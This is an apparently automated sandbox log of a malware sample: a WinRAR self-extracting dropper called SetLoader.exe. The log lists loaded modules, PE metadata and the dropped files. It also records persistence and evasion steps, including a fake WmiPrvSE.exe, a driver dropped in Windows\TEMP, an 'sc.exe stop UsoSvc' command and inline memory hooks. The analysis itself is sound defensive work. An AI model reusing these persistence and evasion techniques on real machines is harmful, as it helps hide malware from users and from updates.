Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe | Section loaded: ntmarta.dll
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\choice.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: profapi.dll
              Source: C:\Users\user\Desktop\SetLoader.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: SetLoader.exe Static file information: File size 15458400 > 1048576
              Source: SetLoader.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: SetLoader.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: SetLoader.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: SetLoader.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: SetLoader.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: SetLoader.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: SetLoader.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: SetLoader.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SetLoader.exe, SetLoader.exe, 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp, SetLoader.exe, 00000000.00000000.1696717128.0000000000646000.00000002.00000001.01000000.00000003.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: w1.exe, 00000004.00000002.2313531816.0000000003B6A000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: w1.exe, 00000004.00000002.2314431379.00000000048FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbern.default source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: w1.exe, 00000004.00000002.2314431379.00000000048FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: HealthTool.exe, 0000002A.00000003.2852954825.00000000001E0000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatory source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: w1.exe, 00000004.00000002.2313531816.0000000003B6A000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831r source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatiner source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: SetLoader.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: SetLoader.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: SetLoader.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: SetLoader.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: SetLoader.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: initial sample Static PE information: section where entry point is pointing to: .&T7
              Source: C:\Users\user\Desktop\SetLoader.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4045156
              Source: SetLoader.exe Static PE information: section name: .didat
              Source: w1.exe.0.dr Static PE information: section name: .didata
              Source: HealthTool.exe.5.dr Static PE information: section name: .00cfg
              Source: HealthTool.exe.5.dr Static PE information: section name: .2}k
              Source: HealthTool.exe.5.dr Static PE information: section name: .Zj[
              Source: HealthTool.exe.5.dr Static PE information: section name: .&T7
              Source: WmiPrvSE.exe.41.dr Static PE information: section name: .oU[
              Source: WmiPrvSE.exe.41.dr Static PE information: section name: .G&p
              Source: WmiPrvSE.exe.41.dr Static PE information: section name: .>n>
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_0063125A push ecx; ret 0_2_0063126D
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_0064B45D push esi; ret 0_2_0064B466
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_0064BA78 push eax; retn 0064h 0_2_0064BA85
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_00631DB0 push ecx; ret 0_2_00631DC3
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe Code function: 4_2_03477721 push edi; iretd 4_2_03477722
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe Code function: 4_2_034753E8 push ebx; ret 4_2_034753F0
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe Code function: 4_2_03471832 push edx; retf 4_2_03471833
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe Code function: 41_2_000000014027AA32 push rax; ret 41_2_000000014027A9AD
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe Code function: 41_2_000000014027AA32 push rbx; iretw 41_2_000000014027A9DF
              Source: C:\Windows\System32\conhost.exe Code function: 67_2_0000000140001394 push qword ptr [0000000140008004h]; ret 67_2_0000000140001403

              Persistence and Installation Behavior

              Source: C:\ProgramData\PcHealthTool\HealthTool.exe File created: C:\Windows\TEMP\kzezoxxlsgop.sys
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe File created: C:\Windows\Temp\kzezoxxlsgop.sys (x2)
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe File created: C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exe
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe File created: C:\ProgramData\PcHealthTool\HealthTool.exe (x2)
              Source: C:\Users\user\Desktop\SetLoader.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (x8)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (x6)
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe Memory written: PID: 6104 base: 7FFE22370008 value: E9 EB D9 E9 FF
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe Memory written: PID: 6104 base: 7FFE2220D9F0 value: E9 20 26 16 00
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe Memory written: PID: 5328 base: 7FFE22370008 value: E9 EB D9 E9 FF
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe Memory written: PID: 5328 base: 7FFE2220D9F0 value: E9 20 26 16 00
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe Memory written: PID: 5628 base: 7FFE22370008 value: E9 EB D9 E9 FF
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe Memory written: PID: 5628 base: 7FFE2220D9F0 value: E9 20 26 16 00
              Source: C:\Users\user\Desktop\SetLoader.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (x2)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (x108)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
